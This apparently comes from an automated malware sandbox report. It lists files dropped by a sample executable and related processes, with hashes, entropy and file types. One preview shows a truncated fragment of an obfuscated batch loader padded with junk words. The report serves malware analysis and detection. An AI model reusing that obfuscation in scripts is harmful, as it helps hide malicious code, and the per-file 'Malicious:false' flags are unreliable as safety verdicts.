                                                                                                                                                                                                                                                                                    SHA-256:D810BC7CB8297BA644F1D151A94C0E3D1C478B352038BD04F279D503BF9B3D63
                                                                                                                                                                                                                                                                                    SHA-512:C3C182724A653CE8248E04EEAB542318FCB0CFDC8932FE23600BC4798210D5DFE324017E1FCEBA3F8B6EB185B7F9D19C03EB3FE006E291B48F98272FC02465FA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Set Agrees=l..bYoXValve-Balloon-Tricks-Odds-Syndicate-..XHrkMove-Mysterious-Boxed-Stevens-Automobiles-..cEYVAble-..LayVInvestments-..bnLicensing-Ar-Due-..crJill-Webster-Edited-Ali-Jm-Camping-Governmental-..PCCEMotion-Tony-Bahrain-Winner-Through-Living-Soldier-Animals-Nec-..leyNecessity-Serial-Scotia-..qBhAttention-Push-Tractor-Deer-..Set Fisting=a..djjCock-Tourism-Possibly-Trains-Enquiries-Reasons-Verified-..LYjCompare-Stack-Airline-Rich-Wrap-Pupils-Produces-Administrative-Defendant-..keInduced-Imagine-Expansion-Q-Beautiful-..AnPants-Adjustable-Clear-..pDuQYouth-Gore-Connecting-Clinic-Falls-Cliff-Brick-Fine-..CkAPounds-Opinion-..SfGOver-Pediatric-Replied-Lime-Unity-Controller-..FqBusy-Theology-Honda-Contrast-Darwin-..hgyoReggae-Readers-Visual-Derek-Regime-It-..CAEating-Kinds-Combining-..Set Indigenous=U..jzvIKnowledgestorm-Bacteria-Surrounding-Nottingham-Own-Mining-Duke-..aXTDetermine-Everybody-Powerseller-Designated-Ira-Wa-Went-..eZXChrome-Determine-Jesse-Speech-Gather-Blogger-Hrs-..p
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):34229
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.176230259714888
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:ZOTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:8TGODv7xvTphAiPChgZ2kOE6
                                                                                                                                                                                                                                                                                    MD5:F37691E9FF7DB399507A1680E937C8AD
                                                                                                                                                                                                                                                                                    SHA1:5E28AFA103E5183A5ACB7B1CCE9FBD5781CB61A0
                                                                                                                                                                                                                                                                                    SHA-256:292424CB00CB8F14F25589106A61B52DEE4A8C4253E891FB3C66DDDBE9FE210B
                                                                                                                                                                                                                                                                                    SHA-512:D5E58FCB7215BC56494DD9E05F04428372456742CFB7682A1018FE044ECB2F9212088F1082F4D5C2D55B46DF7EEA4BE3A504D4D6FF818C3AAB9868C7B33A7CD7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72704
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.946134766246351
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:G/mwftIQXoSpu88888888888888888888888888888zv888888NfU84444QnoooD:G/mex/SGKY
                                                                                                                                                                                                                                                                                    MD5:B52D4A59CC65776F74415CB844E98FEC
                                                                                                                                                                                                                                                                                    SHA1:AA4032DF4DA4DC4F5955EE0E48079B27B64329EB
                                                                                                                                                                                                                                                                                    SHA-256:7712DFE325D7D5E5CCB0CB494C17F2A5576BB4B733AF11352589AEFE398D4EEB
                                                                                                                                                                                                                                                                                    SHA-512:AC8A8F07192910BF11CB76B9A7F9D61294B284CB8B8E999F605B73FF6EB4B1A66D69E41B2AC2E8A1F10576D6162803312E0F34CC4DB655F97A682D8D4EF201ED
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:SoftQuad troff Context intermediate
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):110592
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.329085679036274
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:fj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdj:r6whxjgarB/5elDWy4ZNoGmx
                                                                                                                                                                                                                                                                                    MD5:4367D8625C460A6D48A54DCF9F27927E
                                                                                                                                                                                                                                                                                    SHA1:F34AF7B1C78512FEDD875123167EEF8B3E64B744
                                                                                                                                                                                                                                                                                    SHA-256:466C90B657A6D1C36E66A0A690BE542BFF3322914D028957509E89B2FA2E9660
                                                                                                                                                                                                                                                                                    SHA-512:DBF7BCDBF2F05EF791DF1AB3024E6F336F611DAEB81E07F6C1A81AFD70D1FB1B03A7B8E2F05ED2D2F9A3E9270A9590BD1B3DF85AE02325B83049BAD34E97D5BB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:X has not been compiled.malformed \P or \p sequence.unknown property name after \P or \p.subpattern name is too long (maximum 32 characters).too many named subpatterns (maximum 10000).repeated subpattern is too long.octal value is greater than \377 in 8-bit non-UTF-8 mode.internal error: overran compiling workspace.internal error: previously-checked referenced subpattern not found.DEFINE group contains more than one branch.repeating a DEFINE group is not allowed.inconsistent NEWLINE options.\g is not followed by a braced, angle-bracketed, or quoted name/number or by a plain number.a numbered reference must not be zero.an argument is not allowed for (*ACCEPT), (*FAIL), or (*COMMIT).(*VERB) not recognized or malformed.number is too big.subpattern name expected.digit expected after (?+.] is an invalid data character in JavaScript compatibility mode.different names for subpatterns of the same number are not allowed.(*MARK) must have an argument.this version of PCRE is not compiled with Uni
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):81920
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997778612174641
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:1536:Epw2OgleR8WrgdkgbNnED5YUAZoAQkX1vQmMkUb33pot39pESAw7IBow1:EpqGTP5nED6XZoAQkX99Ub3Gt3Y1wMOI
                                                                                                                                                                                                                                                                                    MD5:94FBF53BED71838B7F036C99A69A04F8
                                                                                                                                                                                                                                                                                    SHA1:57FF8BE476332DD6E30A150219CDDA4CEFF5A73D
                                                                                                                                                                                                                                                                                    SHA-256:D22467276506B5A4EE8A389FE40ADC923405AEDEA955C400F7A08D29384B64C8
                                                                                                                                                                                                                                                                                    SHA-512:1972445C9E1FBE966A37D792047EA6DAEF18C503C03006E8EE1F75DABE33C504F85A571217982EE67FC571F8FC8D204BAA8A0C12B240D503605EA79A9471BA65
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):90112
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.9983692819957195
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:1536:lJPTkT0knmD3ZqDTAmJHRCjRGPK/NtSejbU4AC0SwZZECmYLZunQb+DvzYZH:cT0kMpsAmJHwoeJPU4B0zo+qzOH
                                                                                                                                                                                                                                                                                    MD5:044F5330FF060782BE410405981407C6
                                                                                                                                                                                                                                                                                    SHA1:24EA2F21BA08424C7EFACA1CE01BD7F4D804BD16
                                                                                                                                                                                                                                                                                    SHA-256:B349DB72FC848120D656FB74371BDCCE34BCBA0D501C5A2E594E86BC938E7BD3
                                                                                                                                                                                                                                                                                    SHA-512:3E99EBBFF921871367802A9AB7A400D2366104E7985F98FE50B76ACAB8D88EBCE59C4C8A7FE87298B65D4C31088FA917841D5789A30C94E8E3AD522BAFC45605
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):76800
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997909761032615
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:1536:aJqo9SOA43j0qycQ/rSKebxT2aW7DS4GWVvTtmNFKBMbkLnk:aJq2z0L/rS9K/S2VaKBMqk
                                                                                                                                                                                                                                                                                    MD5:1E6B1CE5757D63BF5C1135F508D6B581
                                                                                                                                                                                                                                                                                    SHA1:00D591AA90AF2DDB27731C4250583B63C778A057
                                                                                                                                                                                                                                                                                    SHA-256:5996A92CD25C465C82472DC4301015C128B1FD90A062005098D75D2A028AE5E6
                                                                                                                                                                                                                                                                                    SHA-512:8E41105A2DD0ACFECFE713D129ECB193CCB02778DCF07D23C0623DB2348A84139613836AC2C0C9676DAEBFA131ECBDC4F23D6A44A9929154C99FB6C7DE08D349
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72704
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.591102673995394
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:ai8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/s0:10Imbi80PtCZEMnVIPPBxT/s0
                                                                                                                                                                                                                                                                                    MD5:7EB8A7B1DCF555CBF3505D13E6386C5D
                                                                                                                                                                                                                                                                                    SHA1:AE36FFFBCDA8AAE412B0AA09C67DC9AE937C991A
                                                                                                                                                                                                                                                                                    SHA-256:D2B540058D7831277BC84C13F28EEBEDE379575C30AF5C5AE071D15A27BE01AD
                                                                                                                                                                                                                                                                                    SHA-512:41D8F919AA7D5145A8ED059022C704FB6F1CCFBFA33670561385E4148C74D1A0797A34FDF309A6FE5F2082041A1F9C1B557C571B7FE6F5B34CA25CEF90987703
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1702
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.738920378932054
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:VyGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhB4+Jvd:m9n9mTsCNvEQH5O5U1nPKrhBzF
                                                                                                                                                                                                                                                                                    MD5:265DB1C7E2990F9FFA3B5AE465863214
                                                                                                                                                                                                                                                                                    SHA1:B1E49C5ECFF9979CF4CFE3F8B37FA6FF5F219EDE
                                                                                                                                                                                                                                                                                    SHA-256:7CAD121427D03FC5848BD8B78EA7D9DFACB8C3B0D554C7F953F52F2163714920
                                                                                                                                                                                                                                                                                    SHA-512:142B3E32F2514B0633EE727082FE5B40971AFA5161E3FAEE9965052D80A730ADB01D52F67CBBF6AE6256F5C9635E6EF0D05B136C281A5688CFA602F370D8CE4E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):117760
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.0718564446790815
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:Re6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtt:R314V14ZgP0JaAOz04phdT
                                                                                                                                                                                                                                                                                    MD5:052B141A15B4DD50165BBFDC9947EC38
                                                                                                                                                                                                                                                                                    SHA1:11527DAB56ACC5CEE04F913DECB0D16C94641106
                                                                                                                                                                                                                                                                                    SHA-256:0FBA6AE390225C1F5F200B98643AD78B297DD1427727539AEC7055A2C60A614F
                                                                                                                                                                                                                                                                                    SHA-512:8EC8D302526C52AAE4EAE075E5FE7BE164C9FD2F71DFE8CA0E148FB78B426D280C2DA4739DB3AF96AC2C66BF3A591E4DBD87C41683884F1F4A9F1861511F77C6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):142336
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.71205536008383
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:0W2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAU4C2:uUDtf0accB3gBmmLsiS+SAhC2
                                                                                                                                                                                                                                                                                    MD5:D0B70806A9A080BCBDFFBC134CC25562
                                                                                                                                                                                                                                                                                    SHA1:2A3B28FF0C7B8531F819BA358E505C71F0875133
                                                                                                                                                                                                                                                                                    SHA-256:FC0679E63BC43D6D6924F6AC0EFAEFFB0CDF0955100429C884AAE991936AC39C
                                                                                                                                                                                                                                                                                    SHA-512:6DC1FCF5F73B8460036550269FE83E8D737E5A17A852D0957BB60A16CB2293C6C79D7756D4672194D13E2C2727FDE4E6412C479D42570837BC56E28FC11B5A5E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):103424
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.255236945108948
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:lZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3lx:lK5vPeDkjGgQaE/lx
                                                                                                                                                                                                                                                                                    MD5:5D30E8BA9C3DE161DC1C927CE83069D3
                                                                                                                                                                                                                                                                                    SHA1:B376D8705C597FFD16D3083F39492D945F2E26A4
                                                                                                                                                                                                                                                                                    SHA-256:E39DFA1CCF160EA83D3D9957E66B32B2817CAD27116070571A8A9189A4DE2888
                                                                                                                                                                                                                                                                                    SHA-512:4508FCF39BDCB26B2ED25DFD67D53C3BD5783907D78E1FB123E31B570112D30F561684DC73F280A40E643EEF5BBBF56B68630A5CF3DBB3DC2F88B54992D994AC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, 489707 bytes, 11 files, at 0x2c +A "Widescreen" +A "Automatically", ID 7745, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):489707
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.99877735006721
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:XO+IOSpdBKVprs/hh6eZ3hbTEeIchSN+2h6TEC3qqXfll:X6npWpI/bzvE+hSPh6YkqqX9l
                                                                                                                                                                                                                                                                                    MD5:68D6786EBC1AB8EBB3887894A4403252
                                                                                                                                                                                                                                                                                    SHA1:B47893B4B518BF1512CF0AF8BA62F3F24FF215F0
                                                                                                                                                                                                                                                                                    SHA-256:37B24182C21259FA5926A38C114A3CBCB2372D0116B11A906C728928E6DCCF8D
                                                                                                                                                                                                                                                                                    SHA-512:0B9B9D47C3FAF6EB54B0A6D9671A46240AD645B4C0EE9E05292DFF6801AFEED78E8D0F41CBDBD63B53CB3016F82762EDE6431F3733480EAB3644F1FFD1E1628E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40971
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.995401646285635
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:768:Ej8NM4OPjfM4GIqWFmiWWBsTGyQoo22WLdDZl2RGlByXgLHo+DwxSHOrdDiAz3wx:EgG4KvIRTG10XV25XgL1DESurwL9
                                                                                                                                                                                                                                                                                    MD5:14FBF99EB9C4DBA9ADFBB8A60DC0CD8B
                                                                                                                                                                                                                                                                                    SHA1:20DDE7F153055A00C38B1007AFACFDD0D1C9BC67
                                                                                                                                                                                                                                                                                    SHA-256:85250A753B5C0B51ED49D72F0788A3199CFB45B01DCBDFF3ECD918BAF6CCB8BE
                                                                                                                                                                                                                                                                                    SHA-512:2EA7998355B738E9027A0EEA789443EA1263C897F113E1B19BA19D7944659FB6C17DB2AAC967E8EAB828F5936C81FA60F4C00D0685761484E5C78D4E56B65E8F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):53248
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.541710327002043
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:ZjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/D7:ZnueoMmOqDoioO5bLezW9FfTut/D7
                                                                                                                                                                                                                                                                                    MD5:B5A9A0E7149D9A61C2C243AFB592EC65
                                                                                                                                                                                                                                                                                    SHA1:BAC9564EC168A8D8325C03AD298D4BD1187709A0
                                                                                                                                                                                                                                                                                    SHA-256:F88E95FF97C36F3FD38E44E09055D24BFD452A0FE5FFEDF9559EED76CC70AD00
                                                                                                                                                                                                                                                                                    SHA-512:5309E3B7CF1866B3808FC1E4B5203DFF8781F2745B3D679562CDE5A2102604AAA6E4B08143BE892FF01634A6DC52D45F2B0082ECEA798591BCCD22E1A0CCF738
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2110
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.402299446924969
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrl:8e2Fa116uCntc5toYCFNM
                                                                                                                                                                                                                                                                                    MD5:1C6EF392C2A385B26FE30B1A73F077EE
                                                                                                                                                                                                                                                                                    SHA1:6B02059F982A13451CF0713317FE4343698A6199
                                                                                                                                                                                                                                                                                    SHA-256:8C13E31B28CBD8E358D7A42103C34018653690B849866FB0DE509EDEE4375E29
                                                                                                                                                                                                                                                                                    SHA-512:13E090C9F30BD83D6B5A988B6189CF55154260A81F660AC413C5A17A40A01CEF42E55BEAA7C0951276AF54EF73B194A471B00071B82AAB811D1F0777DB8B7EB7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4982
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                    MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                    SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                    SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                    SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):908
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                    MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                    SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                    SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                    SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1285
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                    MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                    SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                    SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                    SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
